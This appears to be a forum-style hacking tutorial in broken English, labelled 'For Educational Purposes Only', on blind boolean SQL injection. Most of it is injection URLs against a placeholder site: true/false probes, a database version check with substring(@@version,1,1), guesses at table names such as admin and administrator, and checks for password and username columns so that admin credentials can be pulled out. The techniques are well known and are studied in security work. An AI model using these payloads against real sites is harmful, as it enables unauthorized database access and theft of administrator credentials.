Kobez Expanding Vulnerable Collection Guide!: For Educational Purposes Only!
Kobez Expanding Vulnerable Collection Guide!: For Educational Purposes Only!
(ascii char)
Checking vulnerability
Lets start, In what cases do we know if it really is a blind injectable site only?
Wel, you have a site. same as normal injection whit php?if= of pfp?f= of other stuff.. dous not mather.
we want to check if he is vulnerable. so we put and 1=1 behind the id number.
that is always true. ib this case we do not get an error,
now the real test: instead of 1=1 use and 1=2
Code:
www.[site].com/index.php?id=1+and+1=2
do not forget: and 1=1 means true. page wil return unharmed.
and 1=2 is false. page returns in error or moved content.
sinse it is blind sqli... the site will not pop up the version when you put version() no it needs more.
It always needs..
Using the substring(@@version,1,1) is asking if the =4 is true. so we ask database. hey database, is this a
version 4 you use.
Database is like No wtf i'm awesome. (he returns false.)
That means instead of =4 put =5
Code:
www.[site].com/index.php?id=1 and substring(@@version,1,1)=5
Database returns true. (page is normal)
this means its a version 5 database.
how do we guess?
we put something like this: and (select 1 from users limit 0,1)=1
what did i do? wel.
I ask database hey do you in any case have a table name called USERS? database no im awesome. guess
again.
database returned false so we try again.
Code:
www.[site].com/index.php?id=1 and (select 1 from admin limit 0,1)=1
now i asked database if he has an admin column. database answers: yes im awesome. and returns true.
that means we have a hit yay.
If you are unluckly you need to guess more.
Code:
www.[site].com/index.php?id=1 and (select substring(concat(1,password),1,1) from
administrator limit 0,1)=1
What did i do?
Wel i askt database hey, do you have a column password in table administrator?
database yes i have one.
he returned true.
we stil need usernames or what else they called it.
Code:
www.[site].com/index.php?id=1 and (select substring(concat(1,username),1,1) from
administrator limit 0,1)=1